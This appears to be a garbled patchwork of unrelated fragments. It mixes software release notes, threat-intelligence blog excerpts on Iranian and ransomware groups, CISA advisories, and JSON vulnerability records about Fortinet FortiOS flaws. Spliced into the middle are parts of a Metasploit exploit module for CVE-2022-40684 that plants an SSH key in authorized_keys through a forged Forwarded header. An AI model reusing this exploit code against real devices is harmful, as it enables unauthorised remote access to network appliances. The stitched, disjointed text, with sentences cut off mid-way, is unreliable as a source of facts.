The API key can be tested with the web browser by using the following url to get a list of supported voices. Enhancement New link to documentation in Help tab. The scanner will now use the ORACLE_HOME variable from the running process, in case the process current working directory (CWD) is not a valid ORACLE_HOME path (PRB0043159). FIX-Navigating to the SaaS overview page in large environments will no longer time out (PRB0042496). FIX-Added translation for agreement will expire notification to support the scenario where criteria are empty. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers]() or the \n[binary installers]() (which also include the commercial edition). As you can see most of those are quite old (the first four digits in a CVE ID are the year in which the CVE was issued) and patches have been available for a considerable time.\n\n### General mitigation strategy\n\nWhile some vulnerabilities have specific additional mitigations that you can read about in the items linked in the list above, the advisory hands us the following general mitigations:\n\n * Keep systems and products updated and patch as soon as possible after patches are released since many actors exploit numerous vulnerabilities.\n * Expect that the risk from data stolen or modified (including credentials, accounts, and software) before a device was patched will not be alleviated by patching or simple remediation actions. NEW- Visualize product-centric Oracle License Compliance using dashboard, NEW- Automatic dynamic license assignment (phase 1). NEW Security best practices: HTML headers have been updated to align with OWASP best practices, to protect against attackssuch as clickjacking and MIME-sniffing. FIX The list of Will expire agreements included in the notification e-mail, now only shows expired agreements within the time period pre-selected in the Expires within number of days . In addition, the application now allows you to manage your Kali chroot independently, including rebuilding and deleting the chroot as needed. (04540577, 04560455), Fix Fixed the error Invalid length parameter passed to the RIGHT function by adding, Fix The computer data will not interfere with the execution of the service itself. This type of exploit is sometimes referred to as Arbitrary Code Execution (ACE). Improvements to overall stability and performance. Network Management Card 2 (NMC2), Network Management Card 3 (NMC3), and the NMC embedded devices including: Uninterruptible Power Supply (UPS) products APC Power Distribution products Cooling products Environmental Monitoring Battery Management products. IT security teams and SOCs can work together with the authorized use of this tool to enable the reduction of exposed credentials. Some of the other tools developed by the attackers include: \n \n\n\n * STSRCheck - A tool for mapping databases, servers, and open ports in the targeted network and brute-force them by logging with default credentials.\n * Port.exe - A tool to scan predefined ports and servers.\n \nOnce the attackers gained lateral movement capabilities, the attackers move to the final stage: execute the backdoor to scan the compromised system for relevant information and exfiltrate the files back to the attacker by establishing a remote desktop connection (using a self-developed tool called POWSSHNET) or opening a socket-based connection to a hardcoded IP address. Monitor, govern and optimize your entire cloud environment from servers to SaaS. Diagnostics enabler for cloud application metering. FIX An improvement of performance has been made following a previous fix on the Search for Computers page (04364284). \u201cThese three vulnerabilities targeting the Fortinet VPN allow an attacker to obtain valid credentials, bypass multifactor authentication (MFA), and man-in-the-middle (MITM) authentication traffic to intercept credentials.\u201d\n\nHanley added, \u201cThe common theme here is: once they are successful, they will look just like your normal users.\u201d\n\nThe bugs are popular with cyberattackers in general, due to Fortinet\u2019s widespread footprint, researchers noted.\n\n\u201cCVE-2018-13379 is a critical vulnerability in the Fortinet FortiOS SSL VPN that has been favored by cybercriminals since exploit details became public in August 2019,\u201d Satnam Narang, staff research engineer at Tenable, said via email. \n# Google Dork: intext:\"Please Login\" inurl:\"/remote/login\" \n# Date: 17/08/2019 \n# Exploit Author: Carlos E. Vieira \n# Vendor Homepage: \n# Software Link: \n# Version: This vulnerability affect ( FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 ). [Screenshot of scheduled tasks used by DEV-0270 actor group in their attacks. The implant provides basic functionality of allowing the threat actor to upload stolen files and download files to run.\n\nAll web requests by the CreepyDrive implant use the _Invoke-WebRequest_ cmdlet. (PRB0043026). (04475459), FIX Zendesk connector:Improved handling of empty results from Zendesk to avoid that SIM aggregation fails. However, if you dont, Enable-DCAzureADPIM will prompt for credentials automatically. FIX Fixed an issue where Unassigned Inventoried Software rows in Snow Management and Configuration Center were not displayed correctly. NEW Oracle recalculate Compliance:This version of Snow License Manager enables the users to manually start Oracle recalculate compliance by clicking the Oracle recalculate compliance button in the context menu. \nCredentials from Password Stores [[T1555]()]| Russian state-sponsored APT actors have used previously compromised account credentials to attempt to access Group Managed Service Account (gMSA) passwords. FIX The Top number of agreements per agreement type widget on the Agreements overviewpage shows the top 5 agreement types. It first prompted me to install mpv player to get the playback work, everything after that is all fine. NEW Snow Integration Manager now runs on the most recent release of Microsoft .NET Framework. Hello, it is awesome that you made this feature. Restore the device and try enrolling it again. FIX-The Help section links in both Snow License Manager and Snow Management and Configuration Center have been updated to point to the correct versions of the products. FIX Oracle Database Enterprise Edition Options usage interpretation details are now being optimized for storage when data size is large (04489950). FIX Added translation for report description in other languages than English (04471027). NEW Office 365 Cloud application user activity The user activity charts for the cloud applications Microsoft Project Online Professional and Skype for Business PSTN Conferencing have been updated and can now display data (PRB0041995). If not, no scanning takes place, improving the response time for Windows environments. Fix Support for Isof command has been added to resolve paths on PA RISC /HP UX machines when the pfiles are missing from their expected location. \n\n \n \n The 'Help' option displays this informational message. NEW SaaS Dropbox Now uses v2 of get_events API call. FIX The Oracle Management Option service is being improved. ]109\n * 172[.]96[.]188[. FIX Fixed an issue where HpDdmi connector did not include filepath from linux applications, FIX Fixed an issue where SIM / IDR security token did not tolerate different timezones, FIX Fixed an issue where IBM License Metric Tool connector was not working with newer IBM driver packages, FIX Fixed an issue where Altiris connector did not collect OSX and Linux devices, FIX Fixed an issue where BigFix connector demanded that both the BigFix Platform and the Inventory was on the same server, FIX Fixed an issue where ILMT connector did not forward the PVU Per Core to the inventory file, FIX Fixed an issue where Vsphere datecenter / cluster was not listing correct members, NEW New Connector Discovery data from any source, NEW Scanner execution mode configuration: For cases where you have custom behavior that changes the current working directory to a different operating system user, a new filesios.confighas been introduced for configuring the execution mode. Enhancement- BMC remedy connector-Added more filter options includingcomputer system types: Laptop, Desktop, and Server. Microsoft will continue to monitor all this activity by Iranian actors and implement protections for our customers.\n\n \n\nThe post [Evolving trends in Iranian threat actor activity \u2013 MSTIC presentation at CyberWarCon 2021]() appeared first on [Microsoft Security Blog](). Is not working. Hi Jeff! NEW Archiving of computers:The computer archiving functionality has been improved with a new filter that allows the user to include archived machines in the search for computers page. FIX- Amazon Linux servers are now correctly marked as servers. NEW WEB-APPLICATION METERING WITH CHROME, NEW Details of SSD-disks are now included in the scan result, NEW Version information for Windows 10 now contains the full OS version number (previously only the major and minor release numbers were provided, such as 10.0). An often-documented trademark of Ryuk and Conti deployments is naming the ransomware payload _xxx.exe_, a tradition that DEV-0237 continues to use no matter what RaaS they are deploying, as most recently observed with BlackCat. FIX Within next can now be used for date columns when creating notifications. The file name is also reversed to evade detections (_ssasl.dmp)_:\n\n! NEW To enhance security, the server name and build number have been removed from the Inventory server splash screen, NEW The visibility of long text values has been improved on the device summary page, NEW A clarification has been added in the agent configuration wizard to show which OSs are eligible for software exclude, FIX The relationship between physical hosts and virtual machines updates correctly following a new scan (ServiceNow 0001264, 0001272), FIX Terminal Server applications are stored correctly (ServiceNow 0001322). FIX: Risk of license duplication during save not prevented (04423173). [LOGO](\n\nNOTE: Example image obtained from \n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-06-04T00:00:00", "type": "attackerkb", "title": "CVE-2018-13379 Path Traversal in Fortinet FortiOS", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-5591", "CVE-2020-12812"], "modified": "2021-07-27T00:00:00", "id": "AKB:35B88369-C440-49C0-98FF-C50E258FB32C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa": [{"lastseen": "2021-04-02T18:11:09", "description": "The Federal Bureau of Investigation (FBI) and CISA have released a [Joint Cybersecurity Advisory]() (CSA) to warn users and administrators of the likelihood that advanced persistent threat (APT) actors are actively exploiting known Fortinet FortiOS vulnerabilities [CVE-2018-13379](), [CVE-2020-12812](), and [CVE-2019-5591](). The flexibility to customize patch deployment allows you to patch all the remaining CVEs in your patching to-do list.\n\nTo get a view of all available patches for CISA\u2019s top 15 exploitable vulnerabilities of 2021, go to the Patch Management application and run this QQL statement in the Patches tab:\n \n \n cve:[`CVE-2021-44228`, `CVE-2021-40539`, `CVE-2021-34523`, `CVE-2021-34473`, `CVE-2021-31207`, `CVE-2021-27065`, `CVE-2021-26858`, `CVE-2021-26857`, `CVE-2021-26855`, `CVE-2021-26084`, `CVE-2021-21972`, `CVE-2020-1472`, `CVE-2020-0688`, `CVE-2019-11510`, `CVE-2018-13379`]\n\n! \n \n** Development ** \n \n** Build ** \nClone the repository and build the JAR file using Maven: \n\n \n \n $ mvn install \n\nUse the JAR file in ` target/saml-raider-1.0-SNAPSHOT-jar-with-dependencies.jar ` as a Burp extension. The attack itself is carried out locally.\n\nWhen a particular vulnerability allows an attacker to execute "arbitrary code", it typically means that the bad guy can run any command on the target system the attacker chooses. Fix When configuring a Master Server installation in Configuration Manager, a license key is required. (PRB0043055), FIX-The NATS service has been improved to not time out during the event store migration. FIX Support for custom field names starting with a digit has been enhanced so that the Search for computers function no longer raises an internal server error (PRB0042276). (PRB0043079), FIX-Solved an issue with missing tenants data after the eventstore migration. That is, is does not decrease by -1 day, no matter the time zone. This method does require a reboot to install and another reboot to lock out access to the workstation.\n\nThe following are DEV-0270\u2019s PowerShell commands using BitLocker:\n\n! Notification Updated: A remediation is available for ModiconM340 X80 Ethernet Communication Modules BMXNOC0401. Family Sharing. Resolves an issue that may prevent iTunes from playing media to third-party AirPlay speakers. FIX VMware Photon OS is now recognized as an operating system of type VMware (04479676). after the update it is taking too long to record the audio, how can I fix this? Initially only available for Windows (Build 167); released for macOS as part of macOS Mojave on September 24, 2018. DEV-0243 falls under activities tracked by the cyber intelligence industry as \u201cEvilCorp,\u201d The custom Cobalt Strike loaders are similar to those seen in publicly documented [Blister]() malware\u2019s inner payloads. Update German and French language support. A load is designed to install other malware or backdoors onto the infected systems for other criminals. PHOSPHORUS operators conducted widespread scanning and ransomed targeted systems through a five-step process: Scan, Exploit, Review, Stage, Ransom.\n\n### Scan\n\nIn the early part of 2021, PHOSPHORUS actors scanned millions of IPs on the internet for Fortinet FortiOS SSL VPN that were vulnerable to [CVE-2018-13379](). Should we all switch to ATTS for 2.1 (1436550454) now though? (LogOut/ This improvement ensures that virtual machines can be correctly matched to their host, and associated inventory data can be correctly shown in Snow License Manager views and reports (PRB0041929). There is also a possibility of economic sanctions against institutions, territories or even countries that show a lack of resolve to combat cybercrime that originates on their territory._\n\n**Yes. Users whose most recent login is more than 3 months ago are now included in the data extracted by this connector. FIX Microsoft Intune connector Added page size textbox and retry logic for HTTP calls to handle GatewayTimeout HTTP errors returned by the Microsoft Graph API (04416804). Snow Inventory 3.x is and has been EOL for some time and we have therefore removed all support for this. Recently discovered vulnerability CVE-2022-40684, which has been attributed to Fortinet Products, is among the exploited vulnerabilities. \n[ ]() \n[ ]() \n[ ]() \n[ ]() \n \n \n\n\n** [ Download Roothelper ]() **\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-01-14T22:30:14", "type": "kitploit", "title": "RootHelper - A Bash Script That Downloads And Unzips Scripts That Will Aid With Privilege Escalation On A Linux System", "bulletinFamily": "tools", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2016-01-14T22:30:14", "id": "KITPLOIT:119877528847056004", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-01T21:29:17", "description": "[ ! A new agent configuration setting has been added, http.timeout. In 2021, we saw Egregor, one of the noisiest ransomware families, reborn from Sekhmet and previously from Maze, [get busted](). FIX Archived Licenses and Agreements documents and links are visible in the UI (04498672). i love your Script. (04530543), FIX Fixed an issue where an API user could log into the SLM web. This is now the case, even if users log on to a device that is outside of their own domain,in another organization or business unit, for example, FIX System users can no longer view archived computers without the correct organization access, FIX Right-clicking unassigned software rows in Snow Management and Configuration Center (SMACC) and selecting hide no longer raises the specified cast is not valid error and now hides the selected row, FIX When the license metric for an application is set to be concurrent users/devices, this setting needs to be manually input in SLM, otherwise the data update job (DUJ) fails. However, judging from their geographic and sectoral targeting, which often lacked a strategic value for the regime, we assess with low confidence that some of DEV-0270\u2019s ransomware attacks are a form of moonlighting for personal or company-specific revenue generation. ')\n end\n\n def cleanup\n return unless ssh_socket\n\n # it assumes our key is the last one and set it to a random text. The user will be notified and a new name for the custom field will be required (04427337). ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-09T13:00:00", "type": "mssecure", "title": "Ransomware-as-a-service: Understanding the cybercrime gig economy and how to protect yourself", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-0604", "CVE-2019-11510", "CVE-2019-19781", "CVE-2020-10189", "CVE-2020-8243", "CVE-2020-8260", "CVE-2021-20016", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-31207", "CVE-2021-40444", "CVE-2021-44228"], "modified": "2022-05-09T13:00:00", "id": "MSSECURE:27EEFD67E5E7E712750B1472E15C5A0B", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "dsquare": [{"lastseen": "2021-07-28T14:33:45", "description": "File disclosure vulnerability in Fortinet FortiGate SSL VPN fgt_lang lang parameter\n\nVulnerability Type: File Disclosure", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-08-17T00:00:00", "type": "dsquare", "title": "Fortinet FortiGate SSL VPN File Disclosure", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2019-08-17T00:00:00", "id": "E-691", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team. CWE-668: Exposure of Resource to Wrong Sphere, Geo SCADA Mobile Version Build 222 and prior, CVE-2022-32515, CVE-2022-32516, CVE-2022-32517, CVE-2022-0223, CVE-2022-22731, CVE-2022-22732, EcoStruxure Power Commission Versions prior to V2.22, Schneider Electric C-Bus Home Automation Products, Schneider Electric C-Bus Network Automation Controller - LSS5500NAC V1.10.0 and prior Schneider Electric Wiser for C-Bus Automation Controller - LSS5500SHAC V1.10.0 and prior Clipsal C-Bus Network Automation Controller - 5500NAC V1.10.0 and prior Clipsal Wiser for C-Bus Automation Controller - 5500SHAC V1.10.0 and prior SpaceLogic C-Bus Network Automation Controller - 5500NAC2 V1.10.0 and prior SpaceLogic C-Bus Application Controller - 5500AC2 V1.10.0 and prior, CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer, EcoStruxure Cybersecurity Admin Expert(CAE) Versions 2.2 and prior. This data is packaged together with the normal inventory scan of the target machine and sent to Snow Inventory Server for storage and processing. This feature can be toggled through a setting in SMACC, and is turned on by default (04470218). Be default, it's probably hidden, but if you create a new preset, select a word and click the right mouse button, it'll be there. FIX -In Service Provider Edition, step 13 of the Data Update Job no longer waits indefinitely for resources when data processing has completed successfully for all customers on the platform. FIX Additional checks are now carried out before a particular Oracle Middleware product installation is deleted from Snow License Manager (04534005). They are also offering to sell insider Accenture information to interested parties.\n> \n> \u2014 Eamon Javers (@EamonJavers) [August 11, 2021]()\n\n## Blessed Be the Backups\n\nYes, we were hit, but we\u2019re A-OK now, Accenture confirmed: \u201cThrough our security controls and protocols, we identified irregular activity in one of our environments. On occasion, actors dumped LSASS to acquire credentials to be used later for lateral movement.\n\n! FIX The All Servers view now shows all computers recognized as servers (04449252). \n\n**TokenMan** \u2013 This new and open-source token manipulation tool will help you in post-exploitation activities when working with Azure Active Directory \u2013 especially useful when you have a Family of Client ID (FOCI) access. nAzureADMSPrivilegedRoleAssignmentRequest In addition, DEV-0193 managed the Ryuk RaaS program before the latter\u2019s shutdown in June 2021, and Ryuk\u2019s successor, Conti as well as Diavol. FIX Drives could be skipped when using multiple physical drives in combination with anonymous partitions. It is now possible to generate SLM access based on groups from Active Directory. NEW ORACLE FUNCTIONALITY CONSOLIDATION:All features and capabilities related to Oracle products have now been consolidated under the Oracle overview page accessible from the Enterprise menu item. ('admin') ? The threat group creates or activates the _DefaultAccount_ account to add it to the Administrators and Remote Desktop Users groups. Note: the SaaS connector for each SaaS provider needs to be setup and configured in Snow Integration Manager. FIX Aliases in the organizational structure are now deleted as expected when the structure is overwritten or imported (PRB0041964). And then add a SSH key to the\n authorized_keys file of the chosen account, allowing\n to login to the system with the chosen account.\n\n Successful exploitation results in remote code execution.\n },\n 'Author' => [\n 'Heyder Andrade <@HeyderAndrade>', # Metasploit module\n 'Zach Hanley <@hacks_zach>', # PoC\n ],\n 'References' => [\n ['CVE', '2022-40684'],\n ['URL', ''],\n ['URL', ''],\n ],\n 'License' => MSF_LICENSE,\n 'DisclosureDate' => '2022-10-10', # Vendor advisory\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'FortiOS',\n {\n 'DefaultOptions' => {\n 'PAYLOAD' => 'generic/ssh/interact'\n },\n 'Payload' => {\n 'Compat' => {\n 'PayloadType' => 'ssh_interact'\n }\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [\n IOC_IN_LOGS,\n ARTIFACTS_ON_DISK # SSH key is added to authorized_keys file\n ]\n }\n )\n )\n\n register_options(\n [\n'TARGETURI', [true, 'The base path to the Fortinet CMDB API', '/api/v2/cmdb/']),\n'USERNAME', [false, 'Target username (Default: auto-detect)', nil]),\n'PRIVATE_KEY', [false, 'SSH private key file path', nil]),\n'KEY_PASS', [false, 'SSH private key password', nil]),\n'SSH_RPORT', [true, 'SSH port to connect to', 22]),\n'PREFER_ADMIN', [false, 'Prefer to use the admin user if one is detected', true])\n ]\n )\n end\n\n def username\n if datastore['USERNAME']\n @username ||= datastore['USERNAME']\n else\n @username ||= detect_username\n end\n end\n\n def ssh_rport\n datastore['SSH_RPORT']\n end\n\n def current_keys\n @current_keys ||= read_keys\n end\n\n def ssh_keygen\n # ssh-keygen -t rsa -m PEM -f `openssl rand -hex 8`\n if datastore['PRIVATE_KEY']\n @ssh_keygen ||= Net::SSH::KeyFactory.load_data_private_key(\n['PRIVATE_KEY']),\n datastore['KEY_PASS'],\n datastore['PRIVATE_KEY']\n )\n else\n @ssh_keygen ||= OpenSSL::PKey::EC.generate('prime256v1')\n end\n end\n\n def ssh_private_key\n ssh_keygen.to_pem\n end\n\n def ssh_pubkey\n Rex::Text.encode_base64(ssh_keygen.public_key.to_blob)\n end\n\n def authorized_keys\n pubkey = Rex::Text.encode_base64(ssh_keygen.public_key.to_blob)\n \"#{ssh_keygen.ssh_type} #{pubkey} #{username}@localhost\"\n end\n\n def fortinet_request(params = {})\n send_request_cgi(\n {\n 'ctype' => 'application/json',\n 'agent' => 'Report Runner',\n 'headers' => {\n 'Forwarded' => \"for=\\\"[]:#{rand(1024..65535)}\\\";by=\\\"[]:#{rand(1024..65535)}\\\"\"\n }\n }.merge(params)\n )\n end\n\n def check\n vprint_status(\"Checking #{datastore['RHOST']}:#{datastore['RPORT']}\")\n # a normal request to the API should return a 401\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, Rex::Text.rand_text_alpha_lower(6)),\n 'ctype' => 'application/json'\n })\n\n return CheckCode::Unknown('Target did not respond to check.') Notification Updated: A release is available for SCADAPack RemoteConnect R2.7.3 that addresses workstation vulnerabilities. \u2022Enable multifactor authentication (MFA) for all users, without exception. To set an option, simply use the \"set\" keyword. This version of ATT&CK for Enterprise contains 14 Tactics, 193 Techniques, 401 Sub-techniques, 135 Groups, 14 Campaigns, and 718 Pieces of Software. This version included tighter integration with iCloud, and a new user interface. Once this is done, the device restarts and the process is completed by accepting the created profile in the device. 'admin' : users.sample\n else\n vprint_status(\"PREFER_ADMIN is #{datastore['PREFER_ADMIN']}, we will get a random that is not the admin.\")\n (users - ['admin']).sample\n end\n end\n\n def add_ssh_key\n if current_keys.include? Enhancement Character set improvements. it gives a lot better quality audio from Google TTS. \n\nWithout the ability to steal access to highly privileged accounts, attackers can\u2019t move laterally, spread ransomware widely, access data to exfiltrate, or use tools like Group Policy to impact security settings. This vulnerability is identified as CVE-2022-41352. The threat group commonly uses native WMI, net, CMD, and PowerShell commands and registry configurations to maintain stealth and operational security. FIX-A problem with identifying the display adapter has been resolved (PRB0041604). Fortinet is aware that a malicious actor has disclosed on a dark web forum, SSL-VPN credentials to access FortiGate SSL-VPN devices. For example, the Mayor of Miami [declared]() that the City plans to start paying residents who use cryptocurrency, and he [stated on Twitter]() that he would receive his salary 100% in bitcoin. FIX-The agent parses SMBIOS information retrieved from the local machine so that BIOS version numbers of more than two levels, such as n.n.n, are now extracted correctly and the correct hardware/vendor information is displayed in Snow License Manager. You can also set print quotas and hold jobs until released by the author. New iTunes Extras will be automatically added to your previously purchased HD movies as they become availableat no additional charge. Once the users are assigned, you can see the devices listed under Managed devices view on the MDM server. The only recent change was the addition of Anki 2.1.41 support, it only affects the editor screen and shouldn't cause any slowdown. [6] Introduced at Macworld 2005 with the new iPod Shuffle, Version 4.7.1 introduced the ability to convert higher-bitrate songs to 128kbit/s AAC automatically, as these devices did not natively support audio encoded in AIFF or Apple Lossless formats, also improving the value proposition of the Shuffle's limited flash-only storage. ENHANCEMENT- Support for Web Application usage metering in Snow License Manager 9 has been implemented. This helps in effectively identifying and tracking these vulnerabilities. FIX An Active Directory Discovery scan is not blocked when the server cannot establish its identity due to a communication timeout. NEW Discovery data from new Snow Integration Connectors for Azure and Amazon EC2 can now be received, and is stored in the Snow Inventory DB. FIX-An issue related to missing operating system and network adaptor from the data about a device has been resolved by limiting simultaneous processing of files sent by the same device (PRB0041091 and PRB0040821). After the encryption, the ransomware deletes itself from the disk and creates persistence upon startup. NEW Exporting devices from the Inventory 5 database to an output file, now recreates TSapplications in the same format that the inventory agent. In DEV-0243\u2019s initial partnerships with DEV-0206, the group deployed a custom ransomware payload known as WastedLocker, and then expanded to additional DEV-0243 ransomware payloads developed in-house, such as PhoenixLocker and Macaw.\n\nAround November 2021, DEV-0243 started to deploy the LockBit 2.0 RaaS payload in their intrusions. \"Armed with insights like these, we can better detect and defend important assets together.\"\n\n \n\n\nFound this article interesting? And so far, except some errors popup occasionally and some of the dictionary datasets are not accessible, all is fine. This blog will also expose further details that show Iranian threat actors may be collaborating with proxies to operationalize their attacks. FIX Applications are removed from a computers installed application list when they are removed, but the removal leaves leftovers such as .swidtag files or registry keys (04474224). Streamline IT service delivery and increase business agility. The group often utilizes BITSadmin /transfer to stage their payloads. Complete release notes for Snow License Manager 9.1is found. Solution 2: Press the Fix it button in Xbox Networking (Windows 10 only) This solution only applies to Windows 10. The current detections, advanced detections, and IOCs in place across our security products are detailed below.\n\n## Recommended mitigation steps\n\nThe techniques used by DEV-0270 can be mitigated through the following actions:\n\n * Apply the [corresponding security updates for Exchange Server](), including applicable fixes for [CVE-2021-26855](), [CVE-2021-26858](), [CVE-2021-26857]() and [CVE-2021-27065](). **\u201cHuman-operated\u201d means human decisions**\n * Exfiltration and double extortion\n * Persistent and sneaky access methods\n 3. I've been looking for add-ons to enhance my experience and this is the most useful out of those I've tried. FIX-The Error encountered message no longer displays when configuring additional options in Snow Inventory Server Configuration Manager (PRB0042399). Unfortunately, I'm unable to repeat my greatest IT achievement right now. They target cloud administrator accounts to set up forwarding rules for email exfiltration and tamper with administrative settings on cloud environments. \u201cGenerally speaking, management interfaces for devices like FortiWeb should not be exposed directly to the internet anyway \u2014 instead, they should be reachable only via trusted, internal networks, or over a secure VPN connection.\u201d\n\nThe Rapid7 researchers said that the vulnerability appears to be related to [CVE-2021-22123](), which was patched in June.\n\n## **Fortinet: Popular for Exploit**\n\nThe vendor [is no stranger]() to cybersecurity bugs in its platforms, and Fortinet\u2019s cybersecurity products are popular as exploitation avenues with cyberattackers, including nation-state actors. Such pathnames are now correctly interpreted, and a corresponding software row for the application is created in the Inventory database (PRB0041931). Ill explain it further down. FIX-The Web Configurator tool is now able to extract hardware identifier on a Japanese operating system (PRB0042455). Enhancement ServiceNow CMDB connector: The items formerly imported into vCenter Instance are now imported into vCenter Datacenter. NEW Datacenter information pane in License assignment functionality has additional information:When a user is assigning licenses to datacenter/cluster by using License assignment functionality, the lefthand side Datacenter Information pane is additionally extended with overview of datacenter/cluster hosts information relevant for the licensing requirements and assignment. Users can input text that is longer than input window, data is saved correctly, displayed with the right font, and a scrollbar has been added for improved visibility. FIXOracleTo improve the user experience in terms of information displayed, the Server column has been removed from the data grid of the Databases tab. There are 16 vulnerabilities which have been prioritized based on the CVSS score associated with them. Processing is now carried our correctly by Office 365 service and data displays as expected. Any teams deploying BloodHound should monitor it carefully for malicious use. If this isn\u2019t possible, make sure that your legacy systems are either physically isolated through a firewall or logically isolated by ensuring they have no credential overlap with other systems.\n\nFor Microsoft 365 Defender customers, the following checklist eliminates security blind spots:\n\n * Turn on [cloud-delivered protection]() in Microsoft Defender Antivirus to cover rapidly evolving attacker tools and techniques, block new and unknown malware variants, and enhance attack surface reduction rules and tamper protection.\n * Turn on [tamper protection]() features to prevent attackers from stopping security services.\n * Run [EDR in block mode]() so that Microsoft Defender for Endpoint can block malicious artifacts, even when a non-Microsoft antivirus doesn\u2019t detect the threat or when Microsoft Defender Antivirus is running in passive mode. FIX Nutanix virtual machines are recognized as such. \n \nSuccessful exploitation results in remote code execution. (04514909). ]79:80\n * 45[.]80[.]149[. Schneider Electric PACTware V5.0.5.30 and prior. FIX -Extra error management to handle SAP-supported zero date formats (0000-00-00 and 0) has been added to the SAP import feature (PRB0040801). Once it meets the criteria, a DEV is converted to a named actor.\n\n## Observed actor activity\n\n### Initial access\n\nIn many of the observed DEV-0270 instances, the actor gained access by exploiting known vulnerabilities in Exchange or Fortinet (CVE-2018-13379). In the coming days, these hunting queries will be available to all Qualys EDR customers. For virtual AIX computers that cannot be identified with the built-in identity model, the default value for this setting is on. You can use Apple Configurator 2 to enroll devices not purchased directly from Apple or its reseller with ABM as explained here. Thank you for asking but I can't do it. A new cloud report named SaaS Connectors All users has been added. FIX All date fields for the SaaS connectors 